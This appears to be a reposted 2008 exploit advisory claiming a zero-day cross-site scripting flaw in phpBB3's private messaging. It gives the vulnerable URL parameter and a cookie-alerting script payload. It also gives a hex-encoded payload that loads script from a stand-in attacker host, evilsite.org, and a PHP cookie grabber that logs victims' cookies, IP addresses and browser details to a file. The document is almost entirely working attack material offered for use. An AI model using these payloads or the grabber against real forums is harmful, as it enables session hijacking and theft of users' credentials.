XSS Private Messagging On PhpBB3(0day)

抵达上海

北京奥运男子110米栏首轮刘翔因伤退出比赛

Large | Medium | Small

[

August 18, 2008 12:51 | by !4p47hy ]

################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]

程序代码:

http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779

Where is:

程序代码:

[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
Redirect Code [Ascii --> Hex]:

程序代码:

[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)

Cookies grabber:

程序代码:

<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);

?>